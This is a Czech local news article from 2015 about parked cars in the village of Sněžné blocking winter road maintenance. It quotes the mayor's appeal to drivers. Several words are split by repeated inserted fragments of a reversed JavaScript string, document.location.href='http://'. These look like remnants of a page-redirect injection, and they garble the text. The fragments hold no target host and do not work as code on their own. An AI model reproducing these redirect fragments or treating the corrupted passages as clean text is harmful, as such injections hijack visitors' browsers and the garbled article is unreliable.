sníh, zimní údržba
Rainbow page separator

Zaparkovaná auta brání v zimní údržbě

Neděle, 18. ledna 2015

Sněžné / Na řidiče, kteří v zimě parkují svoje vozidla na místních komunikacích, chce apelovat vedení Sněžného. Odstavené au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž nezřídka činí problémy při zimní údržbě silnic a chodníků. Není možné pomocí techniky odhrnout sníh, případně cesty posypat inertním materiálem.
„Aby mohla být řádným způsobem zabezpečována zimní údržba komunikací, je nezbytné, aby na těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to komunikacích nebylo parkováno. Obsluha je pak nemůže prohrnovat, ale ani sypat, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože kličkovat mezi zaparkovanými vozy prostě nejde,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovala starostka Sněžného Anna Havlíková.
Pokud řidiči při intenzivních sněhových srážkách svoje vozidla nepřeparkují do míst, kde nebudou nikomu a ničemu překážet, obyvatelé Sněžného se kvalitní zimní údržby nedočkají. „Pokud budou auta zaparkována na komunikacích a nebude možné kolem nich projet, nebudou komunikace udržovány,“ potvrdila starostka.